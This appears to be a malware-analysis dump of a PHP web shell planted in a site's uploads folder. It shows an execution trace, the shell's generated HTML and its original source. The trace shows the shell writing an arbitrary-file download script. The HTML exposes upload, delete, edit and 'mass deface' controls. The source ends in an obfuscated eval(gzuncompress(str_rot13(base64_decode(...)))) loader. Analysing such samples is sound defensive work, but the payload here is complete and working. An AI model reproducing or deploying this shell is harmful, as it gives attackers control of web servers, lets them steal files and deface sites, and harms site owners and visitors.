4 22 0 0.003960 480088 is_dir 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 302 1 '/var/www/html/uploads/403.xxx.PhtML'
4 22 1 0.003982 480136
4 22 R FALSE
4 23 0 0.004001 480088 is_dir 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 302 1 '/var/www/html/uploads/data'
4 23 1 0.004020 480120
4 23 R TRUE
4 24 0 0.004040 480152 dirlimit 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 307 2 'data' ???
4 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 518 $dirlim = 'data'
4 24 1 0.004078 480152
4 24 R 'data'
4 25 0 0.004097 480024 clearspace 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 312 1 'data'
5 26 0 0.004117 480024 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 528 3 ' ' '_' 'data'
5 26 1 0.004139 480120
5 26 R 'data'
4 25 1 0.004158 480024
4 25 R 'data'
4 27 0 0.004176 480024 clearspace 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 318 1 'data'
5 28 0 0.004195 480024 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 528 3 ' ' '_' 'data'
5 28 1 0.004215 480120
5 28 R 'data'
4 27 1 0.004283 480024
4 27 R 'data'
4 29 0 0.004412 480024 clearspace 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 323 1 'data'
5 30 0 0.004442 480024 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 528 3 ' ' '_' 'data'
5 30 1 0.004465 480120
5 30 R 'data'
4 29 1 0.004484 480024
4 29 R 'data'
4 31 0 0.004503 480104 clearspace 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 323 1 'data'
5 32 0 0.004523 480104 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 528 3 ' ' '_' 'data'
5 32 1 0.004544 480200
5 32 R 'data'
4 31 1 0.004562 480104
4 31 R 'data'
4 33 0 0.004582 480088 is_dir 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 302 1 '/var/www/html/uploads/prepend.php'
4 33 1 0.004608 480136
4 33 R FALSE
4 34 0 0.004629 480080 is_file 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 332 1 '/var/www/html/uploads/.'
4 34 1 0.004651 480104
4 34 R FALSE
4 35 0 0.004671 480072 is_file 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 332 1 '/var/www/html/uploads/..'
4 35 1 0.004692 480120
4 35 R FALSE
4 36 0 0.004712 480080 is_file 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 332 1 '/var/www/html/uploads/.htaccess'
4 36 1 0.004736 480120
4 36 R TRUE
4 37 0 0.004755 480080 filesize 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 334 1 '/var/www/html/uploads/.htaccess'
4 37 1 0.004776 480120
4 37 R 64
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 334 $jumlah = 0.0625
4 38 0 0.004815 480024 round 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 335 2 0.0625 3
4 38 1 0.004837 480096
4 38 R 0.063
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 335 $jumlah = 0.063
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 339 $jumlah = '0.063KB'
4 39 0 0.004894 480168 wordlimit 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 344 2 '.htaccess' ???
4 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 511 $word = '.htaccess'
4 39 1 0.004932 480168
4 39 R '.htaccess'
4 40 0 0.004953 480056 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 347 1 '.htaccess'
5 41 0 0.004975 480056 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' '.htaccess'
5 41 1 0.004997 480152
5 41 R '.htaccess'
4 40 1 0.005017 480056
4 40 R '.htaccess'
4 42 0 0.005038 480056 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 354 1 '.htaccess'
5 43 0 0.005058 480056 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' '.htaccess'
5 43 1 0.005080 480152
5 43 R '.htaccess'
4 42 1 0.005100 480056
4 42 R '.htaccess'
4 44 0 0.005121 480056 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 360 1 '.htaccess'
5 45 0 0.005142 480056 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' '.htaccess'
5 45 1 0.005163 480152
5 45 R '.htaccess'
4 44 1 0.005183 480056
4 44 R '.htaccess'
4 46 0 0.005203 480152 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 360 1 '.htaccess'
5 47 0 0.005222 480152 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' '.htaccess'
5 47 1 0.005244 480248
5 47 R '.htaccess'
4 46 1 0.005263 480152
4 46 R '.htaccess'
4 48 0 0.005283 480120 is_file 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 332 1 '/var/www/html/uploads/403.xxx.PhtML'
4 48 1 0.005307 480168
4 48 R TRUE
4 49 0 0.005326 480128 filesize 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 334 1 '/var/www/html/uploads/403.xxx.PhtML'
4 49 1 0.005346 480168
4 49 R 5763
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 334 $jumlah = 5.6279296875
4 50 0 0.005383 480032 round 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 335 2 5.6279296875 3
4 50 1 0.005404 480104
4 50 R 5.628
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 335 $jumlah = 5.628
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 339 $jumlah = '5.628KB'
4 51 0 0.005465 480176 wordlimit 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 344 2 '403.xxx.PhtML' ???
4 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 511 $word = '403.xxx.PhtML'
4 51 1 0.005503 480176
4 51 R '403.xxx.PhtML'
4 52 0 0.005534 480176 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 347 1 '403.xxx.PhtML'
5 53 0 0.005556 480176 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' '403.xxx.PhtML'
5 53 1 0.005578 480272
5 53 R '403.xxx.PhtML'
4 52 1 0.005598 480176
4 52 R '403.xxx.PhtML'
4 54 0 0.005619 480176 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 354 1 '403.xxx.PhtML'
5 55 0 0.005637 480176 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' '403.xxx.PhtML'
5 55 1 0.005658 480272
5 55 R '403.xxx.PhtML'
4 54 1 0.005678 480176
4 54 R '403.xxx.PhtML'
4 56 0 0.005699 480176 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 360 1 '403.xxx.PhtML'
5 57 0 0.005718 480176 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' '403.xxx.PhtML'
5 57 1 0.005738 480272
5 57 R '403.xxx.PhtML'
4 56 1 0.005759 480176
4 56 R '403.xxx.PhtML'
4 58 0 0.005778 480272 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 360 1 '403.xxx.PhtML'
5 59 0 0.005797 480272 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' '403.xxx.PhtML'
5 59 1 0.005819 480368
5 59 R '403.xxx.PhtML'
4 58 1 0.005839 480272
4 58 R '403.xxx.PhtML'
4 60 0 0.005860 480232 is_file 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 332 1 '/var/www/html/uploads/data'
4 60 1 0.005885 480264
4 60 R FALSE
4 61 0 0.005906 480232 is_file 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 332 1 '/var/www/html/uploads/prepend.php'
4 61 1 0.005931 480280
4 61 R TRUE
4 62 0 0.005950 480240 filesize 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 334 1 '/var/www/html/uploads/prepend.php'
4 62 1 0.005970 480280
4 62 R 57
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 334 $jumlah = 0.0556640625
4 63 0 0.006007 480144 round 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 335 2 0.0556640625 3
4 63 1 0.006028 480216
4 63 R 0.056
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 335 $jumlah = 0.056
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 339 $jumlah = '0.056KB'
4 64 0 0.006082 480288 wordlimit 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 344 2 'prepend.php' ???
4 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 511 $word = 'prepend.php'
4 64 1 0.006118 480288
4 64 R 'prepend.php'
4 65 0 0.006137 480176 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 347 1 'prepend.php'
5 66 0 0.006157 480176 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' 'prepend.php'
5 66 1 0.006178 480272
5 66 R 'prepend.php'
4 65 1 0.006197 480176
4 65 R 'prepend.php'
4 67 0 0.006216 480176 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 354 1 'prepend.php'
5 68 0 0.006235 480176 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' 'prepend.php'
5 68 1 0.006255 480272
5 68 R 'prepend.php'
4 67 1 0.006273 480176
4 67 R 'prepend.php'
4 69 0 0.006292 480176 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 360 1 'prepend.php'
5 70 0 0.006311 480176 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' 'prepend.php'
5 70 1 0.006331 480272
5 70 R 'prepend.php'
4 69 1 0.006349 480176
4 69 R 'prepend.php'
4 71 0 0.006367 480272 clearfile 1 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 360 1 'prepend.php'
5 72 0 0.006393 480272 str_replace 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 531 3 ' ' '_' 'prepend.php'
5 72 1 0.006414 480368
5 72 R 'prepend.php'
4 71 1 0.006432 480272
4 71 R 'prepend.php'
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 496 $fdlvalue = '<?php \r\n$file_url = $_POST["dlpath"]."/".$_POST["dlname"]; \r\nheader("Content-Type: application/octet-stream"); \r\nheader("Content-Transfer-Encoding: utf-8"); \r\nheader("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\""); \r\nreadfile($file_url); \r\n?> '
4 73 0 0.006487 480176 fopen 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 503 2 'fdl.php' 'w'
4 73 1 0.006551 480808
4 73 R resource(5) of type (stream)
3 A /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 503 $dlwrite = resource(5) of type (stream)
4 74 0 0.006593 480736 fwrite 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 504 2 resource(5) of type (stream) '<?php \r\n$file_url = $_POST["dlpath"]."/".$_POST["dlname"]; \r\nheader("Content-Type: application/octet-stream"); \r\nheader("Content-Transfer-Encoding: utf-8"); \r\nheader("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\""); \r\nreadfile($file_url); \r\n?> '
4 74 1 0.006637 480800
4 74 R 281
4 75 0 0.006656 480736 fclose 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code(1) : eval()'d code 505 1 resource(5) of type (stream)
4 75 1 0.006678 480344
4 75 R TRUE
3 13 1 0.006698 480312
2 7 1 0.006714 428424
0.006752 347008
TRACE END [2023-02-12 19:58:32.230255]
Generated HTML code
<html><head></head><body><h3 class="dirnav">Directory >> <a href="/">/</a><a href="?dir=/var">var</a>/<a href="?dir=/var/www">www</a>/<a href="?dir=/var/www/html">html</a>/</h3> <form method="post" enctype="multipart/form-data">
<input type="file" name="upload">
<input type="submit" name="upl" value="Upload">
</form>
<center>
<!--Mass Deface-->
<form method="post" class="hide massform" id="massform">
<font color="#f00" size="6px">Mass Deface Auto Detect Domain</font><br><br><br>
<div class="inputmass">
<input class="mass" type="text" name="pwd" size="50" value="/var/www/html"><font color="silver" size="1px">/*Ubah Ke document_root untuk mass deface*/</font><br>
<input class="mass" type="text" name="namasc" size="50" placeholder="namafile.ext"><br>
</div>
<textarea name="scdeface" width="400px" placeholder="scdeface" class="massarea"></textarea>
<input type="submit" name="massdef" value="Start" class="btn edt"><br>
</form><!--Table-->
<table class="data-table" id="tabel">
<thead>
<tr class="stamp">
<th>File / Folder</th>
<th>Size</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td style="color: lime">.</td>
<td style="color: lime"><center>-</center></td>
<td><center>
<div id="divneww" style="display:none">
<form method="POST">
<input name="createname" class="fileinput new" type="text" size="20" placeholder="nama" required="">
<select name="type">
<option disabled="disabled" selected="selected">type</option>
<option value="file">file</option>
<option value="dir">dir</option>
</select>
<input type="submit" value="Go" class="btn mini go" name="createnew">
</form>
</div>
<div id="divnew"><button class="btn newf" onclick="display("divnew","divneww")">+File/Dir</button></div> </center>
</td>
</tr>
<tr>
<td><a class="filename" href="?dir=/var/www/html&open=403.xxx.PhtML">403.xxx.PhtML</a></td>
<td style="color: lime;"><center>5.628KB</center></td>
<td><center><form method="POST" id="403.xxx.PhtML_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="403.xxx.PhtML" required="">
<input type="hidden" name="path" value="/var/www/html">
<input type="hidden" name="oldname" value="403.xxx.PhtML">
<input type="submit" value="Go" class="btn mini go">
</form>
<div id="403.xxx.PhtML_link">
<form method="post" class="fatas">
<input type="hidden" value="/var/www/html/403.xxx.PhtML" name="filedl">
<input type="hidden" value="/var/www/html" name="filepath">
<input type="submit" value="del" name="rmfile" class="btn mini rmf">
<a href="?dir=/var/www/html&ubah=403.xxx.PhtML" class="btn">edt</a><a class="btn" href="javascript:display("403.xxx.PhtML_link","403.xxx.PhtML_form");">ren</a></form><form action="fdl.php" method="post" class="fbawah">
<input type="hidden" value="/var/www/html" name="dlpath">
<input type="hidden" value="403.xxx.PhtML" name="dlname">
<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
</form></div></center>
</td>
</tr>
<tr>
<td><a class="filename" href="?dir=/var/www/html&open=beneri.se_malware_analysis">beneri.se_malware_analysis</a></td>
<td style="color: lime;"><center>0KB</center></td>
<td><center><form method="POST" id="beneri.se_malware_analysis_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="beneri.se_malware_analysis" required="">
<input type="hidden" name="path" value="/var/www/html">
<input type="hidden" name="oldname" value="beneri.se_malware_analysis">
<input type="submit" value="Go" class="btn mini go">
</form>
<div id="beneri.se_malware_analysis_link">
<form method="post" class="fatas">
<input type="hidden" value="/var/www/html/beneri.se_malware_analysis" name="filedl">
<input type="hidden" value="/var/www/html" name="filepath">
<input type="submit" value="del" name="rmfile" class="btn mini rmf">
<a href="?dir=/var/www/html&ubah=beneri.se_malware_analysis" class="btn">edt</a><a class="btn" href="javascript:display("beneri.se_malware_analysis_link","beneri.se_malware_analysis_form");">ren</a></form><form action="fdl.php" method="post" class="fbawah">
<input type="hidden" value="/var/www/html" name="dlpath">
<input type="hidden" value="beneri.se_malware_analysis" name="dlname">
<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
</form></div></center>
</td>
</tr>
</tbody>
</table>
<!--Logger-->
<script type="text/javascript">
function display(hide,show){
document.getElementById(hide).style.display = 'none';
document.getElementById(show).style.display = 'block';
}
</script>
</center></body></html>Original PHP code
<?php
//Encrypted at : http://ghostexploiter.ga/tools/obfusfactor
$code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy";$ghost = "=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";
eval(gzuncompress(str_rot13(base64_decode($code))));
exit;
?>